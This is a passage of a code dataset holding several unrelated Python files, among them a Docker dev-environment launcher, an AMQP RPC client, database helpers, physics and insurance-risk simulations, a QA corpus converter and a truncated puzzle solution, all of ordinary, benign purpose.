=======\nsl_builder_image = 'onedata/sl_builder:v2'\nbuilder_image = 'onedata/builder'\n\nconfig_dir = '/home/lichon/IdeaProjects/oneprovider/dev_scripts/cfg'\n\nglobalregistry_pkg_dir = '/home/lichon/IdeaProjects/globalregistry/rel'\nglobalregistry_pkg_name = 'globalregistry-Linux.x86_64.rpm'\n\nprovider_pkg_dir = '/home/lichon/IdeaProjects/oneprovider/releases'\nprovider_pkg_name = 'oneprovider_2.5.0.53.deb'\n# ===================\n\ndns, dns_output = common.set_up_dns('auto', 'onedata')\ngr_name = 'gr_onedata'\ngr = docker.run(\n image=sl_builder_image,\n hostname='gr.onedata.dev.docker',\n detach=True,\n interactive=True,\n tty=True,\n workdir='/root',\n name=gr_name,\n volumes=[(globalregistry_pkg_dir, '/root/pkg', 'ro'),\n (config_dir, '/root/cfg', 'ro')],\n dns_list=dns,\n run_params=['--privileged=true'],\n command='yum install -y pkg/' + globalregistry_pkg_name + ' && sleep 5 && onepanel_admin --install /root/cfg/gr.cfg ; bash')\n\nprovider1 = docker.run(\n image=builder_image,\n hostname='provider1.onedata.dev.docker',\n detach=True,\n interactive=True,\n tty=True,\n workdir='/root',\n name='provider1_onedata',\n volumes=[(provider_pkg_dir, '/root/pkg', 'ro'),\n (config_dir, '/root/cfg', 'ro')],\n dns_list=dns,\n link={gr_name: 'onedata.org'},\n run_params=['--privileged=true'],\n command='dpkg -i pkg/' + provider_pkg_name + ''' || apt-get -y install -f\nsed -i \\\"s/{239, 255, 0, 1}/{238, 255, 0, 1}/g\\\" /opt/oneprovider/nodes/onepanel/etc/app.config\napt-get -y install libnspr4-dev\nsleep 5\nonepanel_admin --install /root/cfg/prov1.cfg\nbash''')\n\nprovider2 = docker.run(\n image=builder_image,\n hostname='provider2.onedata.dev.docker',\n detach=True,\n interactive=True,\n tty=True,\n workdir='/root',\n name='provider2_onedata',\n volumes=[(provider_pkg_dir, '/root/pkg', 'ro'),\n (config_dir, '/root/cfg', 'ro')],\n dns_list=dns,\n link={gr_name: 'onedata.org'},\n run_params=['--privileged=true'],\n command='dpkg -i pkg/' + provider_pkg_name + ''' || apt-get -y install -f\napt-get -y install libnspr4-dev\nsleep 5\nonepanel_admin --install /root/cfg/prov2.cfg\nbash''')\n\n# Replace onedata.org, provider1.onedata.dev.docker, provider2.onedata.dev.docker routing in /etc/hosts\nos.system(\"sed -i \\\"s/.*onedata.org$/`docker inspect --format '{{ .NetworkSettings.IPAddress }}' gr_onedata`\\tonedata.org/g\\\" /etc/hosts\")\nos.system(\"sed -i \\\"s/.*provider1.onedata.dev.docker$/`docker inspect --format '{{ .NetworkSettings.IPAddress }}' provider1_onedata`\\tprovider1.onedata.dev.docker/g\\\" /etc/hosts\")\nos.system(\"sed -i \\\"s/.*provider2.onedata.dev.docker$/`docker inspect --format '{{ .NetworkSettings.IPAddress }}' provider2_onedata`\\tprovider2.onedata.dev.docker/g\\\" /etc/hosts\")\n\nprint([gr, provider1, provider2])","sub_path":"bamboos/docker/demo_up.py","file_name":"demo_up.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"124145494","text":"#!/usr/bin/env python3\nimport AmqpConnector\nimport msgpack\nimport logging\nimport os.path\nimport threading\nimport ssl\nimport time\nimport traceback\n\nRUN_STATE = True\n\nclass RpcHandler(object):\n\tdie = False\n\n\tdef __init__(self, settings):\n\n\t\tthName = threading.current_thread().name\n\t\tif \"-\" in thName:\n\t\t\tlogPath = \"Main.Thread-{num}.RPC\".format(num=thName.split(\"-\")[-1])\n\t\telse:\n\t\t\tlogPath = 'Main.RPC'\n\n\t\tself.log = logging.getLogger(logPath)\n\t\tself.log.info(\"RPC Management class instantiated.\")\n\n\t\tself.settings = settings\n\n\t\t# Require clientID in settings\n\t\tassert 'clientid' in settings\n\t\tassert \"RABBIT_LOGIN\" in settings\n\t\tassert \"RABBIT_PASWD\" in settings\n\t\tassert \"RABBIT_SRVER\" in settings\n\t\tassert \"RABBIT_VHOST\" in settings\n\n\t\tif not self.settings:\n\t\t\traise ValueError(\"The 'settings.json' file was not found!\")\n\n\t\tself.cert = self.findCert()\n\n\n\n\tdef findCert(self):\n\t\t'''\n\t\tVerify the SSL cert exists in the proper place.\n\t\t'''\n\t\tcurFile = os.path.abspath(__file__)\n\n\t\tcurDir = os.path.split(curFile)[0]\n\t\tcertPath = os.path.join(curDir, './deps/cacert.pem')\n\n\t\tassert os.path.exists(certPath)\n\n\t\treturn certPath\n\n\n\n\tdef process(self, body):\n\t\traise ValueError(\"This must be subclassed!\")\n\n\n\tdef _process(self, body):\n\t\t# body = json.loads(body)\n\t\tbody = msgpack.unpackb(body, use_list=True, encoding='utf-8')\n\n\t\tassert isinstance(body, dict) == True, 'The message must decode to a dict!'\n\n\t\tdelay = None\n\n\t\ttry:\n\t\t\tif 'postDelay' in body:\n\t\t\t\tdelay = int(body['postDelay'])\n\n\t\t\tself.log.info(\"Received request. Processing.\")\n\t\t\tret = self.process(body)\n\n\t\t\tassert isinstance(ret, dict) == True, '`process()` call in child-class must return a dict!'\n\n\t\t\t# Copy the jobid and dbid across, so we can cross-reference the job\n\t\t\t# when it's received.\n\t\t\tif 'jobid' in body:\n\t\t\t\tret['jobid'] = body['jobid']\n\n\t\t\tif not 'success' in ret:\n\t\t\t\tret['success'] = True\n\t\t\tif not 'cancontinue' in ret:\n\t\t\t\tret['cancontinue'] = True\n\n\n\t\t\tself.log.info(\"Processing complete. Submitting job with id '%s'.\", ret['jobid'])\n\t\texcept Exception:\n\t\t\tret = {\n\t\t\t\t'success' : False,\n\t\t\t\t'error' : \"unknown\",\n\t\t\t\t'traceback' : traceback.format_exc(),\n\t\t\t\t'cancontinue' : True\n\t\t\t}\n\t\t\tif 'jobid' in body:\n\t\t\t\tret['jobid'] = body['jobid']\n\n\t\t\tself.log.error(\"Had exception?\")\n\t\t\tfor line in traceback.format_exc().split(\"\\n\"):\n\t\t\t\tself.log.error(line)\n\n\n\t\t\t# Disable the delay if the call had an exception.\n\t\t\tdelay = 0\n\n\t\tif not 'cancontinue' in ret:\n\t\t\tself.log.error('Invalid return value from `process()`')\n\t\telif not ret['cancontinue']:\n\t\t\tself.log.error('Uncaught error in `process()`. Exiting.')\n\t\t\tself.die = True\n\n\n\t\tret['user'] = self.settings['clientid']\n\n\t\tself.log.info(\"Returning\")\n\n\t\treturn msgpack.packb(ret, use_bin_type=True), delay\n\t\t# return json.dumps(ret), delay\n\n\tdef successDelay(self, sleeptime):\n\t\t'''\n\t\tDelay for `sleeptime` seconds, but output a \"Oh hai, I'm sleeping\" message\n\t\tevery 15 seconds while doing so.\n\t\tAlso, return immediately if told to exit.\n\t\t'''\n\t\tif sleeptime and not self.die and RUN_STATE:\n\n\t\t\tself.log.info(\"Sleeping %s seconds.\", sleeptime)\n\n\t\t\tfor x in range(sleeptime):\n\t\t\t\ttime.sleep(1)\n\t\t\t\tif (sleeptime - x) % 15 == 0:\n\t\t\t\t\tself.log.info(\"Sleeping %s more seconds....\", sleeptime - x)\n\t\t\t\tif not RUN_STATE:\n\t\t\t\t\tself.log.info( \"Breaking due to exit flag being set\")\n\t\t\t\t\tbreak\n\n\n\n\tdef processEvents(self):\n\t\t'''\n\t\tConnect to the server, wait for a task, and then disconnect untill another job is\n\t\treceived.\n\n\t\tThe AMQP connection is not maintained due to issues with long-lived connections.\n\n\t\t'''\n\n\t\tif self.cert:\n\t\t\tsslopts = {\"cert_reqs\" : ssl.CERT_REQUIRED, \"ca_certs\" : self.cert}\n\t\telse:\n\t\t\tsslopts = None\n\n\t\tshutdownType = \"dirty\"\n\n\t\ttry:\n\t\t\twhile RUN_STATE and not self.die:\n\t\t\t\ttry:\n\t\t\t\t\tconnector = AmqpConnector.Connector(userid = self.settings[\"RABBIT_LOGIN\"],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tpassword = self.settings[\"RABBIT_PASWD\"],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\thost = self.settings[\"RABBIT_SRVER\"],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tvirtual_host = self.settings[\"RABBIT_VHOST\"],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tssl = sslopts,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tsession_fetch_limit = 1,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tdurable = True,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t)\n\t\t\t\texcept IOError:\n\t\t\t\t\tself.log.error(\"Error while connecting to server.\")\n\t\t\t\t\tself.log.error(\"Is the AMQP server not available?\")\n\t\t\t\t\tfor line in traceback.format_exc().split(\"\\n\"):\n\t\t\t\t\t\tself.log.error(line)\n\t\t\t\t\tself.log.error(\"Trying again in 30 seconds.\")\n\t\t\t\t\ttime.sleep(30)\n\t\t\t\t\tcontinue\n\n\t\t\t\tself.log.info(\"Connection Established. Awaiting RPC requests\")\n\n\n\t\t\t\twhile RUN_STATE and not self.die:\n\t\t\t\t\tmessage = connector.getMessage()\n\t\t\t\t\tif message:\n\t\t\t\t\t\tself.log.info(\"Processing message.\")\n\n\t\t\t\t\t\tresponse, postDelay = self._process(message)\n\n\t\t\t\t\t\tself.log.info(\"Response message size: %0.3fK. Sending\", int(len(response)/1024))\n\t\t\t\t\t\tconnector.putMessage(response)\n\t\t\t\t\t\tbreak\n\n\t\t\t\t\ttime.sleep(0.1)\n\n\t\t\t\tself.log.info(\"Closing RPC queue connection.\")\n\t\t\t\tconnector.stop()\n\n\n\t\t\t\tself.successDelay(postDelay)\n\n\n\t\texcept KeyboardInterrupt:\n\t\t\tself.log.info(\"Keyboard Interrupt exit!\")\n\t\t\tself.die = True\n\n\n\t\tself.log.info(\"Halting message consumer.\")\n\t\ttry:\n\t\t\tconnector.stop()\n\t\texcept Exception:\n\t\t\tself.log.error(\"Closing the connector produced an error!\")\n\t\t\tfor line in traceback.format_exc().split(\"\\n\"):\n\t\t\t\tself.log.error(line)\n\n\n\t\tself.log.info(\"Closed. Exiting\")\n\n\t\tif not RUN_STATE or self.die:\n\t\t\traise KeyboardInterrupt\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":5434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"430835709","text":"#!/usr/bin/env python3\n\nimport os\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\nimport datetime\n\n#from app import db, app\n\n\n#engine = create_engine('postgresql://postgres:8008@localhost/EpPicker')\nengine = create_engine(os.environ.get('DATABASE_URL'))\ndb = scoped_session(sessionmaker(bind=engine))\n\ndef get_new_user():\n print(\"begin get_new_user()\")\n row = db.execute(\"SELECT * FROM run ORDER BY cookie desc LIMIT 1\").fetchone()\n if not row:\n big_cookie = 0\n\n else:\n big_cookie = row.cookie\n\n print(big_cookie)\n\n return big_cookie + 1\n\ndef get_show_id(link):\n\n row = db.execute(\"SELECT id FROM show WHERE link= :link\",\n {\"link\": link}).fetchone()\n\n return row[\"show_id\"]\n\ndef update_shows(show):\n print(\"begin update_shows()\")\n print(\"show: \")\n print(show)\n\n #check if show for show already exists\n row = db.execute(\"SELECT * FROM show WHERE link= :link\",\n {\"link\": show[\"link\"]}).fetchone()\n\n #if so, increment the number of shows\n if row != None:\n print(\"row: \")\n print(row)\n\n #update\n db.execute(\n \"UPDATE show SET searches = :next WHERE id = :id\",\n {\"next\": row[\"searches\"] + 1, \"id\": row[\"id\"]}\n )\n\n ret = row[\"id\"]\n print(ret)\n\n #else, add as show\n else:\n\n db.execute(\n \"INSERT INTO show (title, link, image, searches) VALUES (:title, :link, :image, :searches)\",\n {\"title\": show[\"title\"], \"link\": show[\"link\"], \"image\": show[\"image\"], \"searches\": \"1\"}\n )\n\n new = db.execute(\"SELECT * FROM show WHERE link= :link\",\n {\"link\": show[\"link\"]}).fetchone()\n ret = new[\"id\"]\n\n db.commit()\n\n\n\n return ret\n\ndef update_runs(run):\n\n print('begin update_runs()')\n print(run[\"user\"])\n print(type(run[\"user\"]))\n\n #check if run for show exists with matching user\n row = db.execute(\"SELECT * FROM run WHERE show_id= :show_id AND cookie= :cookie\",\n {\"show_id\": run[\"show_id\"], \"cookie\": str(run[\"user\"])}).fetchone()\n\n #if so, update seasons and rating factor\n if row != None:\n\n db.execute(\n \"UPDATE run SET seasons = :seasons, active=:active, rating_factor = :rating_factor, time_stamp = :time_stamp WHERE id = :id\",\n {\"seasons\" : run[\"seasons\"], \"active\": run[\"active\"], \"rating_factor\": run[\"rating_factor\"], \"time_stamp\": datetime.datetime.now(), \"id\": row.id}\n )\n\n\n #else, add run\n else:\n #update\n db.execute(\n \"INSERT INTO run (cookie, show_id, seasons, active, rating_factor, time_stamp) VALUES (:cookie, :show_id, :seasons, :active, :rating_factor, :time_stamp)\",\n {\"cookie\": run[\"user\"], \"show_id\": run[\"show_id\"], \"seasons\": run[\"seasons\"], \"active\": run[\"active\"], \"rating_factor\": run[\"rating_factor\"], \"time_stamp\": datetime.datetime.now()}\n )\n\n\n db.commit()\n\ndef unpack_show(row):\n\n return ({\n \"title\": row.title,\"link\": row.link,\"image\": row.image\n })\n\ndef unpack_seasons(seasons):\n\n format_seasons = seasons[1:-1].split(',')\n\n return list(map(int, format_seasons))\n\n\ndef get_shows():\n\n shows = []\n rows = db.execute(\"SELECT * FROM show ORDER BY searches desc LIMIT 10\").fetchall()\n\n for row in rows:\n\n shows.append(unpack_show(row))\n\n return shows\n\ndef get_runs(user):\n print(\"begin get_runs()\")\n print(\"user: \" + user)\n\n runs = []\n rows = db.execute(\"SELECT * FROM run WHERE cookie=:cookie ORDER BY time_stamp desc LIMIT 10\",\n {\"cookie\": user}).fetchall()\n\n print(len(rows))\n\n for row in rows:\n\n print(row)\n\n show = db.execute(\"SELECT * FROM show WHERE id= :id\",\n {\"id\": row.show_id}).fetchone()\n\n print(show)\n\n unpacked_show = unpack_show(show)\n unpacked_show[\"seasons\"] = unpack_seasons(row.seasons)\n unpacked_show[\"active\"] = unpack_seasons(row.active)\n unpacked_show[\"rating_factor\"] = row.rating_factor\n\n runs.append(unpacked_show)\n\n return runs\n","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":4151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"267815798","text":"from core.managers import BaseManager\nfrom modules.apps.managers import AppConfigManager, AppManager\nimport os\n\n\nclass EnvironmentManager(BaseManager):\n def __init__(self, config_manager, env_name='default'):\n if not isinstance(config_manager, AppConfigManager):\n raise TypeError('Config manager should be an instance of AppConfigManager.')\n\n self.config_manager = config_manager\n self.app = config_manager.app # App instance\n self.env_name = env_name\n\n if 'env' not in config_manager.config.keys():\n config_manager.config['env'] = dict()\n\n self.env = config_manager.config['env']\n if 'default' not in self.env.keys():\n # Make sure default environment always exists\n self.env['default'] = dict()\n\n super().__init__()\n\n def should_exist(self):\n # Expect an environment to exist\n if self.env_name not in self.env.keys():\n self.logger.fail('Environment \"{}\" does not exist.'.format(self.env_name))\n\n def should_not_exist(self):\n # Expect an environment not to exist\n if self.env_name in self.env.keys():\n self.logger.fail('Environment \"{}\" already exists.'.format(self.env_name))\n\n def create(self):\n # Create an environment\n self.should_not_exist()\n\n self.env[self.env_name] = dict()\n self.config_manager.save()\n\n self.logger.info('Environment \"{}\" created.'.format(self.env_name))\n\n def delete(self):\n # Delete an environment\n self.should_exist()\n\n del self.env[self.env_name]\n self.config_manager.save()\n\n self.logger.info('Environment \"{}\" deleted.'.format(self.env_name))\n\n def set(self, **kwargs):\n # Set environment variable(s)\n self.should_exist()\n\n for env_key, env_value in kwargs.items():\n self.env[self.env_name][env_key.upper()] = env_value\n\n self.config_manager.save()\n\n def unset(self, env_key):\n # Unset environment variable(s)\n self.should_exist()\n\n del self.env[self.env_name][env_key.upper()]\n\n self.logger.info('Successfully removed \"{}\" from environment \"{}\".'.format(env_key, self.env_name))\n\n def ls(self):\n # List variables in an environment\n self.should_exist()\n\n for env_name, env_items in self.env.items():\n print('[{}]'.format(env_name))\n for env_key, env_val in env_items.items():\n print('{}={}'.format(env_key, env_val))\n\n def setup_environment(self):\n # Load variables into OS environment\n self.should_exist()\n\n for env_key, env_value in self.env[self.env_name].items():\n os.environ[env_key] = str(env_value)\n\n self.logger.info('Environment \"{}\" loaded.'.format(self.env_name))\n","sub_path":"modules/environment/managers.py","file_name":"managers.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"569256222","text":"\n\nfrom Processor import Processor\n\nfrom datetime import *\n\n# processes GSR, Heart Rate to get a 'threat level' from 0 to 3\nclass TimeDisplayProcessor(Processor):\n\n def __init__(self):\n Processor.__init__(self,\"TimeDisplayProcessor\", [(\"Source\",\"Source data stream\")], [\"Timestamp for incoming samples\"],[(\"countdown\",\"Be a counting down clock: value for start time (seconds) else -1\",\"-1\")]) \n self.run()\n\n def processArguments(self,firsttimeStamp):\n self.countdown = float(self.argumentValues[0])\n self.startTime = None\n \n # main data processing function\n def process(self,timeStamp,values,queueNo):\n \n if self.countdown != -1:\n if self.startTime == None:\n self.startTime = timeStamp;\n \n time = self.countdown-(timeStamp-self.startTime)\n if time < 0:\n time = 0\n \n timestr=datetime.fromtimestamp(time).strftime(\"%M:%S\")\n #timestr=timestr[:-4]\n self.addProcessedValues(timestr)\n \n else:\n \n \n timestr=datetime.fromtimestamp(timeStamp).strftime(\"%Y-%m-%d %H:%M:%S.%f\")\n timestr=timestr[:-4]\n self.addProcessedValues(timestr)\n \nif __name__ == '__main__': TimeDisplayProcessor()\n","sub_path":"Vicarious/Vicarious/Processors/TimeDisplayProcessor.py","file_name":"TimeDisplayProcessor.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"426471205","text":"from __future__ import annotations\nfrom dataclasses import dataclass, field\n\n__NAMESPACE__ = \"http://www.travelport.com/schema/common_v38_0\"\n\n\n@dataclass\nclass TaxDetail6:\n \"\"\"\n The tax idetail nformation for a fare quote tax.\n \"\"\"\n class Meta:\n name = \"TaxDetail\"\n namespace = \"http://www.travelport.com/schema/common_v38_0\"\n\n amount: None | str = field(\n default=None,\n metadata={\n \"name\": \"Amount\",\n \"type\": \"Attribute\",\n \"required\": True,\n }\n )\n origin_airport: None | str = field(\n default=None,\n metadata={\n \"name\": \"OriginAirport\",\n \"type\": \"Attribute\",\n \"length\": 3,\n }\n )\n destination_airport: None | str = field(\n default=None,\n metadata={\n \"name\": \"DestinationAirport\",\n \"type\": \"Attribute\",\n \"length\": 3,\n }\n )\n country_code: None | str = field(\n default=None,\n metadata={\n \"name\": \"CountryCode\",\n \"type\": \"Attribute\",\n }\n )\n fare_info_ref: None | str = field(\n default=None,\n metadata={\n \"name\": \"FareInfoRef\",\n \"type\": \"Attribute\",\n }\n )\n","sub_path":"travelport/models/tax_detail_6.py","file_name":"tax_detail_6.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"314806049","text":"#!/usr/bin/python2.7\n\nimport numpy as np\nfrom numpy import cos,sin,sqrt,power\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom scipy.integrate import odeint\n\n\ng = 9.81\nk = 50\nm = 1\nl = 1\npi = np.pi\n\ndef main():\n\n to = 0\n ang_o = pi/2\n wo = 0\n xo = 0\n vo = 0\n\n co = np.array([ang_o, wo, xo, vo])\n\n tf, dt = 100, 0.01\n\n t = np.arange(0,tf, dt)\n\n solucao = odeint(pendulo_elastico, co, t)\n\n ang, w = solucao[:, 0], solucao[:, 1]\n p, v = solucao[:, 2], solucao[:, 3]\n \n x, y = np.zeros(len(ang)), np.zeros(len(ang))\n\n for i in xrange(len(ang)):\n x[i] = (p[i] + l)*sin(ang[i])\n y[i] = -(p[i] + l)*cos(ang[i])\n\n \n fig=plt.figure()\n ax = plt.axes(xlim=(-2.3,2.3), ylim=(-2.3,2.3))\n line, = ax.plot([], [], 'o-', lw=2)\n\n dot, = ax.plot([], [], 'ro', lw=4)\n time_template = 'Tempo = %.1fs'\n time_text = ax.text(0.05, 0.9, '', transform=ax.transAxes)\n\n def init():\n line.set_data([], [])\n time_text.set_text('')\n dot.set_data([],[])\n return line, time_text, dot\n\n\n def animate(i):\n thisx = [0, x[i]]\n thisy = [0, y[i]]\n\n line.set_data(thisx, thisy)\n dot.set_data(x[i], y[i])\n time_text.set_text(time_template % (i*dt))\n return line, time_text, dot\n\n ani = animation.FuncAnimation(fig, animate, np.arange(0, len(t)), interval=10, blit=True, init_func=init)\n plt.show()\n\n\n\ndef pendulo_elastico(x, t):\n \n o, w, y, v = x[0],x[1], x[2],x[3]\n do, dy = w, v\n\n dv = (l+y)*power(w,2) + g*cos(o) - k*y\n dw = -(w*v + g*(l+y)*sin(o))/(l+y)\n\n dxdt = np.array([do, dw, dy, dv])\n return dxdt\n\nmain()\n","sub_path":"pendulo/elastico_pendulo.py","file_name":"elastico_pendulo.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"478109302","text":"# an insurance risk model\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nsns.set_style('whitegrid')\r\nfrom scipy.stats import expon, lognorm, uniform\r\n\r\n# settings\r\nsim = 300\r\nT = 365 # time scale is day\r\n\r\n# set log-normal distribution\r\n## about random variable need to model\r\nEX = 10000 # mean value\r\nVX = 40000 # variance\r\n## best param of log-normal\r\nsigma2 = np.log((VX / (EX ** 2)) + 1)\r\nmu = np.log(EX) - (sigma2) / 2\r\n\r\n# parameters\r\nLAMBDA = 0.3 # param for interval of claim(Poisson process)\r\nNU = 0.2 # param for interval of new customer(Poisson process)\r\nMU = 0.2 # param for survival time of customer(Poisson process)\r\n\r\n# premium, initial conditions\r\nc = 3000 / T # premium per time for insurance\r\nn0 = 1000 # customers at t = 0\r\na0 = 10000 # capital of insurance company at t = 0\r\n\r\n# distributions\r\nrn = uniform(loc = 0, scale = 1)\r\nclaim_amount = lognorm(s = np.sqrt(sigma2), scale = np.exp(mu)) # amount of each claim\r\ndef nextevent_time(t, n):\r\n X = expon(scale = 1 / (NU + MU + LAMBDA)).rvs(size = 1)\r\n return t + X\r\ndef nextevent_which(n):\r\n U = rn.rvs(size = 1)\r\n p_new = NU / (NU + MU + LAMBDA)\r\n p_lost = MU / (NU + MU + LAMBDA)\r\n p_claim = LAMBDA / (NU + MU + LAMBDA)\r\n if U < p_new:\r\n J = 1 # new customer added\r\n elif p_new <= U and U < p_new + p_lost:\r\n J = 2 # customer lost\r\n else:\r\n J = 3 # claim occured\r\n return J\r\n\r\n# each simulation steps\r\ndef eachrun(T):\r\n t = 0 # time variable\r\n n = n0 # number of policyholders\r\n a = a0 # capital of company\r\n tE = nextevent_time(t, n)\r\n while tE <= T:\r\n a += n * c * (tE - t) # revenue during previous event and now\r\n t = tE # move present time\r\n J = nextevent_which(n)\r\n if J == 1:\r\n n += 1\r\n elif J == 2:\r\n n -= 1\r\n else:\r\n Y = claim_amount.rvs(size = 1) # amount of this claim\r\n if Y > a:\r\n I = 0\r\n a -= Y\r\n break\r\n else:\r\n a -= Y # capital decreased\r\n tE = nextevent_time(t, n) # next event time\r\n else:\r\n I = 1\r\n return I, a\r\n\r\n# simulation run\r\nIs = []\r\nesti = []\r\nfor i in range(sim):\r\n result = eachrun(T)\r\n Is = np.append(Is, result[0])\r\n esti = np.append(esti, np.mean(Is))\r\n print('Capital at time T = {0} in {1}th run:'.format(T, i+1), result[1])\r\nesti = np.append(np.nan, esti)\r\n\r\nplt.plot(esti)\r\nplt.title('Estimating probability of solvent')\r\nplt.xlabel('Number of simulations')\r\nplt.ylabel('Probability')\r\nplt.show()\r\n","sub_path":"7_6_an_insurance_risk_model.py","file_name":"7_6_an_insurance_risk_model.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"272786485","text":"import argparse\nimport os\n\nfrom convert_mlqa2xqa import read_mlqa\nfrom convert_tydi2xqa import read_tydi\nfrom convert_xquad2xqa import read_xquad, read_xquad_context\nfrom data import save_xqa\n\n\nLANGUAGE_MAP = {\"th\": \"thai\",\n \"sw\": \"swahili\",\n \"te\": \"telugu\",\n \"fi\": \"finnish\",\n \"be\": \"bengali\",\n \"ru\": \"russian\",\n \"ja\": \"japanese\",\n \"ar\": \"arabic\",\n \"in\": \"indonesian\",\n \"ko\": \"korean\",\n \"en\": \"english\",\n None: None\n }\n\n\ndef main():\n parser = argparse.ArgumentParser(\"Converting corpora (MLQA, XQUAD, TyDi QA) to XQA format\")\n parser.add_argument(\"in_path\", help=\"Path to corpus\")\n parser.add_argument(\"out_path\", help=\"Path where the result should be saved\")\n parser.add_argument(\"-f\", \"--format\", choices=[\"mlqa\", \"xquad\", \"tydi\", \"xquad-context\"],\n help=\"The format of the input corpus\")\n parser.add_argument(\"-p\", \"--part\", choices=[\"train\", \"dev\", \"test\"])\n parser.add_argument(\"-l\", \"--language\", default=None)\n\n args = parser.parse_args()\n part = args.part\n language = args.language\n\n if args.format == \"mlqa\":\n in_file = os.path.join(args.in_path, part, f\"{part}-context-{language}-question-{language}.json\")\n out_path = os.path.join(args.out_path, \"MLQA\")\n corpus = read_mlqa(in_file)\n elif args.format == \"xquad\":\n in_file = os.path.join(args.in_path, f\"xquad.{language}.json\")\n out_path = os.path.join(args.out_path, \"XQUAD\")\n corpus = read_xquad(in_file)\n elif args.format == \"xquad-context\":\n in_file = os.path.join(args.in_path, f\"xquad.{language}.json\")\n out_path = os.path.join(args.out_path, \"XQUAD_context\")\n corpus = read_xquad_context(in_file)\n elif args.format == \"tydi\":\n in_file = os.path.join(args.in_path, f\"v1.0_tydiqa-v1.0-{part}.jsonl.gz\")\n out_path = os.path.join(args.out_path, \"TYDI\")\n corpus = read_tydi(in_file, LANGUAGE_MAP[language])\n else:\n print(\"Wrong corpus format: \", args.format)\n raise NotImplementedError\n\n path = os.path.join(out_path, language)\n if not os.path.exists(path):\n os.makedirs(path)\n json_filename = os.path.join(path, f\"{part}_doc.json\")\n txt_filename = os.path.join(path, f\"{part}.txt\")\n save_xqa(corpus, json_filename, txt_filename)\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"baselines/convert_corpora.py","file_name":"convert_corpora.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"10726973","text":"import os\nimport sys\nimport time\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m' \n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\nif len(sys.argv) > 1:\n FOLDER = sys.argv[1]\nelse:\n FOLDER = ''\n\n\nif len(FOLDER) != 0 and os.path.exists(FOLDER):\n files = os.listdir(FOLDER)\nelse:\n print('Path is not defined or folder py this path name is not existing.\\n Browsing by the path \\'\\': ')\n files = os.listdir()\n\nfor f in files:\n if os.path.isdir(FOLDER + '/' + f):\n print(bcolors.OKBLUE, f, bcolors.ENDC)\n else:\n print(bcolors.OKCYAN, f, bcolors.ENDC)\n","sub_path":"Lab1/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"597630307","text":"# -*- coding: utf-8 -*-\n\nclass UserInfo:\n def __init__(self):\n self.userid = 0\n self.phone_num = ''\n self.nickname = ''\n self.sex = 0\n self.age = 0\n self.interest = ''\n self.invite_code = ''\n self.inviter_id = 0\n self.inviter_code = ''\n self.create_time = ''\n\n\nclass UserDevice:\n def __init__(self):\n self.device_id = ''\n self.mac = ''\n self.idfa = ''\n self.platform = ''\n self.userid = 0\n self.status = 0\n\n\nclass AnonymousDevice:\n def __init__(self):\n self.device_id = ''\n self.mac = ''\n self.idfa = ''\n self.platform = ''\n self.flag = 0\n self.sex = 0\n self.age = 0\n self.interest = ''\n self.activate_time = ''\n\n\nclass LoginHistory:\n def __init__(self):\n self.userid = 0\n self.device_id = ''\n self.platform = ''\n self.version = ''\n self.ip = ''\n self.network = ''\n","sub_path":"wangcai_svr/account/src/data_types.py","file_name":"data_types.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"208665887","text":"from collections import namedtuple\n\nPoint = namedtuple(\"Point\", [\"x\", \"y\"])\n\ndata = []\nfolds = []\nX, Y = 0,0\nwith open(\"data/day13.txt\") as f:\n for line in f:\n if line[0].isdigit():\n p = Point(*map(int, line.strip().split(\",\")))\n data.append(p)\n X = max(X, p.x)\n Y = max(Y, p.y)\n elif line.startswith(\"fold\"):\n *_, fold = line.strip().split()\n along, coord = fold.split(\"=\")\n folds.append((along, int(coord)))\n\ngrid = [[(x, y) in data for x in range(X+1)] for y in range(Y+1)]\n\ndef display(grid):\n for x in grid[::-1]:\n print(''.join(map(lambda x: \"#\" if x else \".\", x[::-1])))\n\ndef fold_grid(grid, fold):\n along, coord = fold\n if along == \"y\":\n bottom = grid[:coord][::-1]\n top = grid[coord+1:]\n else:\n 